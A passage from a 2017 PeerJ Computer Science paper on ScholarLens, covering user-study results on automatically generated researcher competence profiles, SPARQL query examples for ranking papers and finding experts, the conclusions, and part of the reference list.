analytics features, as shown in Fig. 6. Similar to the first experiment, we generated two surveys for each user: one with the competence topics extracted from the full-text of documents and one with topics extracted from the rhetorical zones only. To lessen the priming bias—where participants may think topics shown earlier in the survey must be more relevant to them—we randomized the order of survey questions and informed the users in the evaluation instructions about this fact. However, we internally kept the original rank of the competence topics shown in survey questions as they appear in the knowledge base profiles, so that we can compute the precision of our system in top- k cut-off ranks. We invited 32 computer scientists to participate in our user evaluations. In total, 25 users responded to the survey (note that an anonymized user like ‘R1’ from the second study is not necessarily the same person as in the first study). In contrast to the Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 24/39 https://peerj.com https://www.limesurvey.org http://dx.doi.org/10.7717/peerj-cs.121 Figure 6 An automatically generated web-based survey using LimeSurvey: (A) depicts the instructions shown to participants to explain the sur- vey motivation and how to select a competence level, and (B) shows an example competency question with an interactive response interface. previous survey, this time we asked the users to rate the competences along three different competence types, namely General which comprises very general and broad topics such as ‘‘System’’ or ‘‘Number’’, Technical which refers to skills a computer scientist needs in daily work, e.g., ‘‘Hypertext Transfer Protocol’’, and Research, which points to research topics a user has been or currently is involved in, e.g., ‘‘Linked Data’’. Result computation All responses were exported into comma-separated value (CSV) files and analyzed with our own Java-based command-line tool, transforming the original horizontal schema into a vertical structure, based on their original rank. We computed the Precision@Rank, the Mean Average Precision (MAP) and the normalized Discounted Cumulative Gain (nDCG), according to the equations presented above (‘Methodology and Metrics’). Table 5 presents the responses for both versions, the full-text profiles and RE Zones, with respect to the overall ratings across the four different competence levels. The results for the precision metrics are displayed in Tables 6 and 7. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 25/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Table 5 Analysis of the survey responses for profiles generated from Full-text and RE Zones. The values shown in the columns are number of competence types as voted by the survey participants. User Competence type in full-text Competence type in RE zones General Technical Research Irrelevant General Technical Research Irrelevant R1 19 7 13 11 17 10 8 15 R2 6 21 18 5 9 21 15 5 R3 14 16 12 8 9 9 9 23 R6 24 8 15 3 12 10 13 15 R9 13 18 9 10 7 25 6 12 R10 12 23 13 2 18 18 5 9 R11 17 19 13 1 20 17 9 4 R12 12 16 21 1 19 13 16 2 R14 11 23 10 6 16 19 6 9 R15 12 23 8 7 16 18 3 13 R16 14 18 15 3 15 22 10 3 R17 16 16 12 6 20 18 8 4 R18 5 12 30 3 15 22 13 0 R19 8 20 15 7 9 14 18 9 R21 3 9 36 2 4 13 32 1 R23 22 18 8 2 18 18 9 5 R25 10 23 10 7 14 15 12 9 R26 18 15 8 9 22 9 6 13 R27 16 14 13 7 12 19 13 6 R28 2 27 18 3 4 24 18 4 R29 6 8 22 14 6 15 12 17 R30 13 21 12 4 22 6 7 15 R31 9 19 14 8 14 14 11 11 R35 7 7 31 5 5 19 18 8 R36 17 9 17 7 9 9 17 15 Total 306 410 393 141 332 397 294 227 24.48% 32.80% 31.44% 11.28% 26.56% 31.76% 23.52% 18.16% Since Precision@k and MAP are based on binary ratings (relevant/non-relevant), it has to be specified which competence levels to take into account. Therefore, we defined two thresholds: Irrelevant (Threshold ‘0’) and General (Threshold ‘1’). For threshold ‘0’, we treated the responses in the General, Technical and Research competence types as relevant. In this case, only Irrelevant entries are counted as errors. However, this might not be appropriate for every application: some use cases might want to also exclude competences in the General category. Therefore, we also analyzed the results for ratings above General, in order to ensure an equal distribution (Tables 6 and 7). Here, competences were only considered as relevant when they were rated either as Technical or Research. Additionally, we computed the nDCG for each profile, which does not penalize for irrelevant competence topics in profiles. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 26/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Table 6 Precision computation for profiles generated from full-text with a relevance threshold of Irrelevant (0) and General (1). All ratings above Irrelevant (0) and General (1) have been considered as relevant, respectively. User Threshold 0—Irrelevant Threshold 1—General nDCG Average precision Precision@k Average precision Precision@k AP@10 AP@25 AP@50 P@10 P@25 P@50 AP@10 AP@25 AP@50 P@10 P@25 P@50 R1 0.90 0.87 0.85 0.80 0.88 0.78 0.88 0.69 0.63 0.60 0.52 0.40 0.90 R2 0.87 0.86 0.88 0.80 0.88 0.90 0.75 0.79 0.80 0.70 0.84 0.78 0.88 R3 1.00 0.90 0.88 1.00 0.84 0.84 0.88 0.80 0.75 0.90 0.68 0.56 0.92 R6 1.00 0.99 0.96 1.00 0.96 0.94 0.37 0.45 0.45 0.40 0.44 0.46 0.83 R9 0.95 0.89 0.85 0.90 0.80 0.80 0.70 0.63 0.58 0.60 0.52 0.54 0.80 R10 1.00 1.00 0.99 1.00 1.00 0.96 0.96 0.89 0.84 0.9 0.8 0.72 0.93 R11 1.00 1.00 1.00 1.00 1.00 0.98 0.90 0.81 0.76 0.80 0.72 0.64 0.92 R12 1.00 1.00 1.00 1.00 1.00 0.98 0.79 0.78 0.78 0.70 0.84 0.74 0.88 R14 0.93 0.94 0.94 0.90 0.96 0.88 0.93 0.88 0.82 0.90 0.80 0.66 0.88 R15 0.82 0.80 0.82 0.70 0.80 0.86 0.83 0.70 0.64 0.60 0.60 0.62 0.87 R16 1.00 1.00 0.98 1.00 1.00 0.94 1.00 0.90 0.83 0.9 0.8 0.66 0.95 R17 1.00 0.94 0.91 0.90 0.92 0.88 0.83 0.73 0.66 0.60 0.64 0.56 0.89 R18 1.00 0.98 0.97 1.00 0.96 0.94 0.79 0.86 0.86 0.90 0.88 0.84 0.94 R19 1.00 0.96 0.91 1.00 0.88 0.86 0.82 0.72 0.70 0.70 0.64 0.70 0.88 R21 1.00 0.96 0.95 0.90 0.96 0.96 1.00 0.96 0.94 0.90 0.96 0.90 0.97 R23 0.99 0.96 0.96 0.90 0.96 0.96 0.61 0.62 0.60 0.70 0.56 0.52 0.84 R25 0.93 0.86 0.85 0.90 0.84 0.86 0.92 0.81 0.75 0.80 0.72 0.66 0.89 R26 0.93 0.92 0.90 0.90 0.88 0.82 0.67 0.58 0.55 0.50 0.52 0.46 0.84 R27 0.81 0.83 0.86 0.80 0.84 0.86 0.77 0.68 0.63 0.70 0.52 0.54 0.86 R28 1.00 0.97 0.94 1.00 0.88 0.94 1.00 0.97 0.94 1.00 1.00 0.88 0.97 R29 0.92 0.83 0.79 0.80 0.72 0.72 0.75 0.70 0.67 0.70 0.6 0.6 0.86 R30 0.91 0.89 0.91 0.90 0.92 0.92 0.54 0.60 0.64 0.50 0.68 0.66 0.85 R31 0.95 0.93 0.89 0.90 0.92 0.84 0.71 0.72 0.71 0.70 0.76 0.66 0.87 R35 0.79 0.88 0.90 0.90 0.88 0.86 0.77 0.80 0.79 0.80 0.76 0.76 0.90 R36 0.99 0.91 0.88 0.90 0.88 0.86 0.99 0.91 0.88 0.90 0.88 0.86 0.94 Mean average precision Average Mean average precision Average 0.95 0.92 0.91 0.91 0.91 0.89 0.80 0.76 0.73 0.74 0.70 0.66 0.89 Discussion Overall, compared to our first user study, our enhanced method resulted in fewer irrelevant results in the user profiles. This is partially due to the improvements mentioned above, where we removed irrelevant entries that affected every generated profile (e.g., the competency entries derived from the word ‘‘figure’’). We also analyzed the distribution of competence topic types in each user profile (Fig. 7). In both profile versions, about 55–65% of the detected competences were rated either as Technical or Research, which corroborates our hypothesis that the named entities in users’ publications are representative of their research expertise. In comparison with the full-text and RE-only version of each user profile, although we observe an increase in the number of irrelevant topics, majority of them fall into the Research and Technical types. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 27/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Table 7 Precision computation for profiles generated from RE zones with a relevance threshold of Irrelevant (0) and General (1). All ratings above Irrelevant (0) and General (1) have been considered as relevant, respectively. User Threshold 0—irrelevant Threshold 1—general nDCG Average precision Precision Average precision Precision AP@10 AP@25 AP@50 P@10 P@25 P@50 AP@10 AP@25 AP@50 P@10 P@25 P@50 R1 0.93 0.90 0.86 0.90 0.80 0.70 0.84 0.68 0.56 0.50 0.40 0.36 0.85 R2 0.87 0.83 0.86 0.70 0.88 0.90 0.86 0.83 0.79 0.70 0.80 0.72 0.88 R3 0.99 0.93 0.87 0.90 0.80 0.54 0.98 0.87 0.81 0.80 0.60 0.36 0.90 R6 0.98 0.91 0.83 0.90 0.76 0.70 0.60 0.60 0.55 0.60 0.52 0.46 0.83 R9 0.91 0.80 0.79 0.70 0.80 0.76 0.79 0.66 0.64 0.60 0.64 0.62 0.81 R10 0.99 0.94 0.90 0.90 0.88 0.82 0.83 0.75 0.62 0.70 0.48 0.46 0.87 R11 1.00 1.00 0.95 1.00 0.96 0.92 0.99 0.86 0.71 0.80 0.56 0.52 0.90 R12 1.00 1.00 0.99 1.00 1.00 0.96 0.67 0.60 0.60 0.50 0.56 0.58 0.88 R14 1.00 0.97 0.90 1.00 0.84 0.82 0.72 0.71 0.64 0.80 0.60 0.5 0.87 R15 0.99 0.90 0.84 0.90 0.80 0.74 0.70 0.65 0.59 0.70 0.56 0.42 0.82 R16 1.00 0.99 0.96 1.00 0.92 0.94 0.95 0.88 0.76 0.90 0.64 0.64 0.91 R17 1.00 1.00 0.98 1.00 0.96 0.92 0.88 0.81 0.71 0.80 0.64 0.52 0.90 R18 1.00 1.00 1.00 1.00 1.00 1.00 0.86 0.80 0.73 0.80 0.68 0.70 0.93 R19 1.00 0.99 0.93 1.00 0.88 0.82 0.75 0.70 0.69 0.50 0.68 0.64 0.89 R21 1.00 1.00 1.00 1.00 1.00 0.98 1.00 1.00 0.99 1.00 1.00 0.9 0.95 R23 1.00 0.97 0.95 1.00 0.92 0.90 0.78 0.76 0.71 0.80 0.68 0.54 0.88 R25 1.00 0.88 0.85 0.80 0.84 0.82 0.98 0.77 0.69 0.70 0.60 0.54 0.93 R26 0.98 0.88 0.80 0.90 0.72 0.74 0.61 0.53 0.41 0.40 0.28 0.30 0.80 R27 1.00 0.97 0.93 1.00 0.88 0.88 0.95 0.89 0.79 0.90 0.68 0.64 0.93 R28 0.84 0.84 0.87 0.90 0.84 0.92 0.84 0.83 0.82 0.90 0.76 0.84 0.90 R29 0.60 0.66 0.67 0.60 0.72 0.66 0.53 0.58 0.56 0.50 0.64 0.54 0.76 R30 0.82 0.81 0.77 0.70 0.76 0.70 0.83 0.53 0.45 0.30 0.36 0.26 0.84 R31 0.96 0.86 0.81 0.80 0.72 0.78 0.64 0.57 0.51 0.50 0.48 0.50 0.81 R35 1.00 0.88 0.84 1.00 0.88 0.84 1.00 0.92 0.83 1.00 0.76 0.74 0.92 R36 1.00 0.94 0.85 0.90 0.84 0.70 0.95 0.86 0.77 0.90 0.88 0.86 0.94 Mean average precision Average Mean average precision Average 0.95 0.91 0.88 0.90 0.86 0.82 0.82 0.74 0.68 0.70 0.62 0.57 0.88 These results are also consistent with our hypothesis that the topics in rhetorical zones of scholarly literature, like claims and contributions of authors are strong indications of their competence. As we can see from the results, the full-text profiles returned less irrelevant results and more higher ratings (64%) than the RE-only version (55%). A closer look on individual responses revealed that the error (Type 1 (Wrong URI)) occurred more often in the RE-only version. A wrong matching of extracted terms to URIs mainly causes a wrong description and hence an irrelevant result. Longer and more comprehensive text passages, as in the full-text profiles, might better compensate this problem and therefore result in less URI mismatches. Too broad and general competences are a further issue when looking at the ratings. Again, the reason was that DBpedia Spotlight that does not distinguish Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 28/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 (A) R1 R2 R3 R6 R9 R1 0 R1 1 R1 2 R1 4 R1 5 R1 6 R1 7 R1 8 R1 9 R2 1 R2 3 R2 5 R2 6 R2 7 R2 8 R2 9 R3 0 R3 1 R3 5 R3 6 0 10 20 30 40 50 #C om pe te nc es in fu ll- te xt (B) R1 R2 R3 R6 R9 R1 0 R1 1 R1 2 R1 4 R1 5 R1 6 R1 7 R1 8 R1 9 R2 1 R2 3 R2 5 R2 6 R2 7 R2 8 R2 9 R3 0 R3 1 R3 5 R3 6 0 10 20 30 40 50 #C om pe te nc es in R E zo ne s General Technical Research Irrelevant Figure 7: The two plots show the distribution of top-50 competence types in full-text (A) and RE-only (B) profiles from the evaluation survey responses.Figure 7 The two plots show the distribution of top-50 competence types in full-text (A) and RE-only (B) profiles from the evaluation survey responses. between composite and single terms, for instance, ‘‘service’’ and ‘‘service provider’’. It finds successful matches for both terms and thus produces general topics. We also evaluated the rated competences with respect to their ranking in the result list. Both metrics, Precision@k and Mean Average Precision have been computed across two relevance thresholds. Threshold ‘0’ denotes the results where all ratings above Irrelevant were considered as relevant, namely, General, Technical and Research. Since this division favours relevant competences, we additionally computed the Precision@k and Mean Average Precision for ratings above General. Among the top-10 results, the RE-only profiles performed slightly better for Threshold ‘1’, which indicates that all the relevant competences are a bit more likely in the Top-10 results than in the full-text profiles. However, the ranking results turn upside down for the Top-50 results, where the MAP value for the full-text version is significantly higher than for the RE-only version. That reveals the ranking in full-text profiles is more stable over 50 competences compared to RE zones. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 29/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Additionally, we analyzed whether the different number of papers per user has an influence on the results. It turned out that there is no correlation between the number of papers used and the obtained precision. Furthermore, we neither take into account a decay function nor distinguish between recent publications or papers a user has written a longer time ago. This leaves room for future work. For all our results, it also needs to be considered that we did not ask the users about missing competences and therefore we did not penalize for incomplete results. The results are grounded on relevance assessments for automatically extracted competences from publications. Rather than completeness, it is an approach to counteract the cold-start problem in personalized applications and to minimize the burden for the user to explicitly provide pertinent information. Overall, we reached high ranking values in the top-10 results for both thresholds, the MAP values for Research and Technical competences vary between 0.80 and 0.95. Looking at the Top-50 competences, full-text profiles performed better than RE zones. Hence, we can conclude that our approach is effective for detecting a user’s background knowledge implicitly. Threats to validity A threat to the external validity of our findings is the scale of evaluation, generalizing the results obtained from studying a relatively small group of computer scientists. To mitigate this effect, when choosing our sample group, we tried to be inclusive of researchers from various computer science sub-disciplines, including those who work in inter-disciplinary areas, such as bioinformatics. We also tried to include both young researchers and senior scientists with a larger number of selected publications. Although the evaluation is admittedly not definitive, our results show the effectiveness and accuracy of our method for the automatic creation of scholarly profiles. At its current stage, we believe that the open source implementation of our approach will facilitate others to collect further empirical evidence, by integrating ScholarLens into various scholarly applications. APPLICATION EXAMPLES As one of our main contributions in this paper is an open source library for generating semantic user profiles from scholarly articles, we want to demonstrate how various end-user applications can incorporate the generated user profiles. Towards this end, in this section we present a number of use cases for exploiting the knowledge base generated by ScholarLens. Finding all competences of a user By querying the populated knowledge base with the researchers’ profiles, we can find all topics that a user is competent in. Following our knowledge base schema (see ‘Design’), we can query all the competence records of a given author URI and find the topics (in form of LOD URIs), from either the papers’ full-text or exclusively the RE zones. In fact, the SPARQL query shown below is how we gathered each user’s competences (from RE zones) to generate the evaluation profiles described in ‘Evaluation’: Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 30/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Table 8 Example response for finding all competence topics of a user. The ‘Extracted Competence Topics’ column lists the topics as linked entities on the web of LOD. The competence topics are sorted by their raw frequency in the user profile, in descending order. User Extracted competence topics R1 dbpedia:Tree_(data_structure), dbpedia:Vertex_(graph_theory), dbpedia:Cluster_analysis, ... R2 dbpedia:Natural_language_processing, dbpedia:Semantic_Web, dbpedia:Entity- relationship_model, ... R3 dbpedia:Recommender_system, dbpedia:Semantic_web, dbpedia:Web_portal, dbpedia:Biodiversity, ... R4 dbpedia:Service_(economics), dbpedia:Feedback, dbpedia:User_(computing), dbpedia:System, ... R5 dbpedia:Result, dbpedia:Service_discovery, dbpedia:Web_search_engine, dbpedia:Internet_protocol, ... SELECT DISTINCT ?uri (COUNT(?uri) AS ?count) WHERE { ?creator rdf:type um:User . ?creator rdfs:isDefinedBy <http://semanticsoftware.info/lodexporter/creator/R1> . ?creator um:hasCompetencyRecord ?competenceRecord . ?competenceRecord c:competenceFor ?competence . ?competence rdfs:isDefinedBy ?uri . ?rhetoricalEntity rdf:type sro:RhetoricalElement . ?rhetoricalEntity pubo:containsNE ?competence . } GROUP BY ?uri ORDER BY DESC(?count) Table 8 shows a number of competence topics (grounded to their LOD URIs) for some of our evaluation participants, sorted in descending order by their frequency in the documents. Ranking papers based on a user’s competences Semantic user profiles can be incredibly effective in the context of information retrieval systems. Here, we demonstrate how they can help to improve the relevance of the results. Our proposition is that papers that mention the competence topics of a user are more interesting for her and thus, should be ranked higher in the results. Therefore, the diversity and frequency of topics within a paper should be used as ranking features. We showed in Sateli & Witte (2015) that retrieving papers based on their LOD entities is more effective than conventional keyword-based methods. However, the results were not presented in order of their interestingness for the end-user. Here, we integrate our semantic user profiles to re-rank the results, based on the common topics in both the papers and a user’s profile: Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 31/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 SELECT (COUNT(DISTINCT ?uri) as ?rank) WHERE { <http: //example.com/example_paper.xml> pubo:hasAnnotation ?topic . ? topic rdf:type pubo:LinkedNamedEntity . ? topic rdfs:isDefinedBy ?uri . FILTER EXISTS { ? creator rdfs:isDefinedBy <http: // semanticsoftware . info / lodexporter / creator /R8> . ? creator um:hasCompetencyRecord ?competenceRecord . ?competenceRecord c:competenceFor ?competence . ?competence rdfs:isDefinedBy ?uri .} } The query shown above compares the topic URIs in a given paper to user R8’s competences extracted from full-text documents and counts the occurrence of such a hit. Note that the DISTINCT keyword will cause the query to only count the unique topics, e.g., if <dbpedia:Semantic_Web> appears two times in the paper, it will be counted as one occurrence. We decided to count the unique occurrences, because a ranking algorithm based on the raw frequency of competence topics will favour long (non-normalized) papers over shorter ones. We can then use the numbers returned by the query above as a means to rank the papers. Table 9 shows the result set returned by performing a query against the SePublica dataset of 29 papers from (Sateli & Witte, 2015) to find papers mentioning <dbpedia:Ontology_(information_science)>. The ‘‘Topic Mentions’’ column shows the ranked results based on how many times the query topic was mentioned in a document. In contrast, the R6 and R8 profile-based columns show the ranked results using the number of common topics between the papers (full-text) and the researchers’ respective profiles (populated from their own publications full-text). Note that in the R6 and R8 profile-based columns, we only count the number of unique topics and not their frequency. An interesting observation here is that the paper ranked fourth in the frequency-based column ranks last in both profile-based result sets. A manual inspection of the paper revealed that this document, although originally ranked high in the results, is in fact an editors’ note in the preface of the SePublica 2012 proceedings. On the other hand, the paper which ranked first in the frequency-based column, remained first in R8’s result set, since this user has a stronger research focus on ontologies and linked open data compared to R6, as we observed from their generated profiles during evaluation. Finding users with related competences Given the semantic user profiles and a topic in form of an LOD URI, we can find all users in the knowledge base that have related competences. By virtue of traversing the LOD cloud, we can find topic URIs that are (semantically) related to a given competence topic and match against users’ profiles to find competent authors: Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 32/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Table 9 Personalized re-ranking of search results: this tables shown how integration of semantic user profiles for researchers R6 and R8 affects ranking of the top-10 results originally retrieved and sorted by a frequency-based method. Paper title Topic mentions R8’s Profile R6’s Profile Rank Raw frequency Rank Com. topics Rank Com. topics ‘‘A Review of Ontologies for Describing Scholarly and Scientific Documents’’ 1 92 1 312 5 198 ‘‘BauDenkMalNetz—Creating a Semantically Annotated Web Resource of Historical Buildings’’ 2 50 5 294 4 203 ‘‘Describing bibliographic references’’ in RDF 3 38 6 269 8 177 ‘‘Semantic Publishing of Knowledge about Amino Acids’’ 4 25 10 79 10 53 ‘‘Supporting Information Sharing for Re-Use and Analysis of Scientific Research Publication Data’’ 5 25 4 306 7 185 ‘‘Linked Data for the Natural Sciences: two Use Cases in Chemistry and Biology’’ 6 23 2 310 1 220 ‘‘Ornithology Based on Linking Bird Observations with Weather Data’’ 7 22 8 248 6 189 ‘‘Systematic Reviews as an Interface to the Web of (Trial) Data: using PICO as an Ontology for Knowledge Synthesis in Evidence-based Healthcare Research’’ 8 19 9 179 9 140 ‘‘Towards the Automatic Identification of the Nature of Citations’’ 9 19 3 307 2 214 ‘‘SMART Research using Linked Data—Sharing Research Data for Integrated Water Resources Management in the Lower Jordan Valley’’ 10 19 7 260 3 214 PREFIX dcterms: <http: // purl .org/dc/terms/> PREFIX dbpedia: <http: //dbpedia.org/ resource /> SELECT ?author_uri WHERE { SERVICE <http://dbpedia.org/ sparql> { dbpedia:Ontology_(information_science ) dcterms:subject ? category . ? subject dcterms:subject ? category . } ?author rdf:type um:User . ? creator rdfs:isDefinedBy ?author_uri . ? creator um:hasCompetencyRecord ?competenceRecord. ?competenceRecord c:competenceFor ?competence. ?competence rdfs:isDefinedBy ? subject . ? rhetoricalEntity pubo:containsNE ?competence. ? rhetoricalEntity rdf:type sro:RhetoricalElement . } The query above first performs a federated query against DBpedia’s SPARQL endpoint to find topic URIs that are semantically related to the query topic (we assume all topics under the same category in the DBpedia ontology are semantically related). Then, it matches the retrieved URIs against the topics of the knowledge base users’ Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 33/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Table 10 By virtue of traversing the web of LOD, topics semantically-related to the query are inferred and their respective competent researchers are shown in the ‘Competent Users’ column. Competence topic Competent users dbpedia:Ontology_(information_science) R1, R2, R3, R8 dbpedia:Linked_data R2, R3, R8 dbpedia:Knowledge_representation_and_reasoning R1, R2, R4, R8 dbpedia:Semantic_Web R1, R2, R3, R4, R5, R6, R7, R8 dbpedia:Controller_vocabulary R2, R3, R8 dbpedia:Tree_(data_structure) R1, R4, R7 competence records. As shown in Table 10, with this approach we can find a researcher competent in <dbpedia:Ontology_(information_science)>, even when this topic is not mentioned directly in her profile, but only has <dbpedia:Linked_data>, since both of the aforementioned topics are related in the DBpedia ontology. In other words, if we are looking for persons competent in ontologies, a researcher that has previously conducted research on linked data might also be a suitable match. CONCLUSIONS We presented semantic user profiles as the next important extension for semantic publishing applications: with a standardized, shareable, and extendable representation of a user’s competences, a number of novel application scenarios now becomes possible. For example, searching for scientists with specific competences can help to find reviewers for a given paper or proposal. Recommendation algorithms can filter and rank the immense amount of research objects, based on the profile of an individual user. A wealth of additional applications becomes feasible, such as matching the competences of a research group against project requirements, simply by virtue of analyzing an inter-linked knowledge graph of users, datasets, publications, and other artifacts. We showed how these ideas can be realized with semantic scholarly profiles that are based on a Linked Open Data-compliant format. To enable the next generation of scholarly applications, we developed a method for the automatic construction of open knowledge bases with semantic user profiles. Our method is implemented in form of the open source ScholarLens library, which can be easily integrated into existing or new scholarly systems. An important part of our work is the automatic generation of the user profiles through a text mining pipeline, which helps to overcome the well-known cold start problem in user profiling. Unlike other existing approaches, ScholarLens populates a knowledge base compliant with the web of linked data, which facilitates connecting the semantic user profiles with other domain- and application-specific information. We demonstrated how such a knowledge base can be exploited for various use cases, using standard SPARQL queries. Based on the results of two rounds of user studies, we can conclude that the generated profiles represent the competences of scientists with a very high accuracy. Evaluating the impact of these profiles on different, concrete tasks is the next logical step in this research. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 34/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.121 Towards this end, we are currently integrating our profile knowledge base into a scholarly data portal for biodiversity research, in order to evaluate their impact on concrete research questions in a life sciences scenario. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was partially funded by an NSERC Discovery Grant. This work was also supported by the DAAD (German Academic Exchange Service) through the PPP Canada program and by the DFG (German Research Foundation) within the GFBio project. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Competing Interests The authors declare there are no competing interests. Author Contributions • Bahar Sateli, Felicitas Löffler and René Witte conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Birgitta König-Ries conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Semantic Software: http://www.semanticsoftware.info/semantic-user-profiling-peerj- 2016-supplements. GitHub: https://github.com/SemanticSoftwareLab/ScholarLens. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.121#supplemental-information. REFERENCES Abel F, Gao Q, Houben G-J, Tao K. 2011. Analyzing user modeling on twitter for per- sonalized news recommendations. In: Proceedings of the 19th international conference on user modeling, adaption, and personalization, UMAP’11. Berlin: Springer-Verlag, 1–12. Balog K, De Rijke M. 2007. Determining expert profiles (with an application to expert finding). In: Proceedings of the 20th international joint conference on artificial intelligence, IJCAI’07. San Francisco: Morgan Kaufmann Publishers Inc., 2657–2662. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 35/39 https://peerj.com http://www.semanticsoftware.info/semantic-user-profiling-peerj-2016-supplements http://www.semanticsoftware.info/semantic-user-profiling-peerj-2016-supplements https://github.com/SemanticSoftwareLab/ScholarLens http://dx.doi.org/10.7717/peerj-cs.121#supplemental-information http://dx.doi.org/10.7717/peerj-cs.121#supplemental-information http://dx.doi.org/10.7717/peerj-cs.121 Balog K, Fang Y, De Rijke M, Serdyukov P, Si L. 2012. Expertise retrieval. Foundation and Trends in Information Retrieval 6(2–3):127–256 DOI 10.1561/1500000024. Berners-Lee T, Hendler J. 2001. Publishing on the semantic web. Nature 410:1023–1024 DOI 10.1038/35074206. Blei DM, Ng AY, Jordan MI. 2003. Latent dirichlet allocation. The Journal of Machine Learning Research 3:993–1022. Bordea G, Buitelaar P. 2010a. DERIUNLP: a context based approach to automatic keyphrase extraction. In: Proceedings of the 5th international workshop on semantic evaluation, SemEval ’10. Stroudsburg: Association for Computational Linguistics, 146–149. Bordea G, Buitelaar P. 2010b. Expertise mining. In: Proceedings of the 21st national conference on artificial intelligence and cognitive science. Galway. Bordea G, Kirrane S, Buitelaar P, Pereira BO. 2012. Expertise mining for enterprise content management. In: Calzolari N, Choukri K, Declerck T, Doǧan MU, Maegaard B, Mariani J, Moreno A, Odijk J, Piperidis S, eds. Proceedings of the eight interna- tional conference on language resources and evaluation (LREC’12). Istanbul, Turkey: European Language Resources Association (ELRA), 3495–3498. Börner K, Conlon M, Corson-Rikert J, Ding Y. 2012. VIVO: a semantic approach to scholarly networking and discovery. In: Synthesis lectures on the semantic web. San Rafael: Morgan & Claypool Publishers. Bostandjiev S, O’Donovan J, Höllerer T. 2013. LinkedVis: exploring social and semantic career recommendations. In: Proceedings of the 2013 international conference on intelligent user interfaces (IUI ’13). New York: ACM, 107–116. Brusilovsky P, Millán E. 2007. User models for adaptive hypermedia and adaptive educational systems. In: Brusilovsky P, Kobsa A, Nejdl W, eds. The adaptive web. Lecture notes in computer science, vol. 4321. Berlin, Heidelberg: Springer, 3–53. Buckley C, Voorhees EM. 2004. Retrieval evaluation with incomplete information. In: Proceedings of the 27th annual international ACM SIGIR conference on research and development in information retrieval, SIGIR ’04. New York: ACM, 25–32 DOI 10.1145/1008992.1009000. Buitelaar P, Eigner T. 2008. Topic extraction from scientific literature for competency management. In: The 7th international semantic web conference. Karlsruhe. Cantador I, Castells P. 2011. Extracting multilayered communities of interest from semantic user profiles: application to group modeling and hybrid recommendations. Computers in Human Behavior 27(4):1321–1336 DOI 10.1016/j.chb.2010.07.027. Celma O. 2006. Foafing the music: bridging the semantic gap in music recommendation. In: Proceedings of the 5th international conference on the semantic web (ISWC’06). Berlin: Springer-Verlag, 927–934 DOI 10.1007/11926078_67. Cortis K, Scerri S, Rivera I, Handschuh S. 2013. An ontology-based technique for online profile resolution. In: Jatowt A, Lim EP, Ding Y, Miura A, Tezuka T, Dias G, Tanaka K, Flanagin A, Dai B, eds. Proceedings of the 5th international conference on social informatics (SocInfo 2013). Lecture notes in computer science, vol. 8238. New York: Springer-Verlag, 284–298. Sateli et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.121 36/39 https://peerj.com http://dx.doi.org/10.1561/1500000024 http://dx.doi.org/10.1038/35074206 http://dx.doi.org/10.1145/1008992.1009000 http://dx.doi.org/10.1016/j.chb.2010.07.027 http://dx.doi.org/10.1007/11926078_67 http://dx.doi.org/10.7717/peerj-cs.121 Croft B, Metzler D, Strohman T. 2009. Search engines: information retrieval in practice. 1st edition. USA: Addison-Wesley Publishing Company. Cunningham H, Maynard D, Bontcheva K, Tablan V, Aswani N, Roberts I, Gorrell G, Funk A, Roberts A, Damljanovic D, Heitz T, Greenwood MA, Saggion H, Petrak J, Li Y, Peters W. 2011. Text processing with GATE (Version 6). University of Sheffield, Department of Computer Science. Daiber J, Jakob M, Hokamp C, Mendes PN. 2013. Improving efficiency and accuracy in multilingual entity extraction. In: Proc. of the 9th international conference on semantic systems (I-Semantics). Draganidis F, Mentzas G. 2006. Competency based management: a review of systems and approaches. Information Management and Computer Security 14(1):51–64 DOI 10.1108/09685220610648373. Fazel-Zarandi M, Fox M. 2012. An ontology for skills and competency management. In: Proceedings of the 7th international conference on formal ontologies in information systems (FOIS 2012). Graz, Austria. Gauch S, Speretta M, Chandramouli A, Micarelli A. 2007. User profiles for personalized information access. In: Brusilovsky P, Kobsa A, Nejdl W, eds. The adaptive web. Lecture notes in computer science, vol. 4321. Berlin, Heidelberg: Springer, 54–89. Golemati M, Katifori A, Vassilakis C, Lepouras G, Halatsis C. 2007. Creating an ontology for the user profile: method and applications. In: Proceedings of the first international conference on research challenges in information science (RCIS). Gonzalez J, Stumme G. 2002. Semantic methods and tools for information portals— The SemIPort Project. In: Semantic web mining. Proc. of the semantic web mining workshop of the 13th Europ. conf. on machine learning (ECML’02)/6th Europ. conf. on principles and practice of knowledge discovery in databases (PKDD’02). Helsinki, August 19, 2002. Haase P, Schnizler B, Broekstra J, Ehrig M, Van 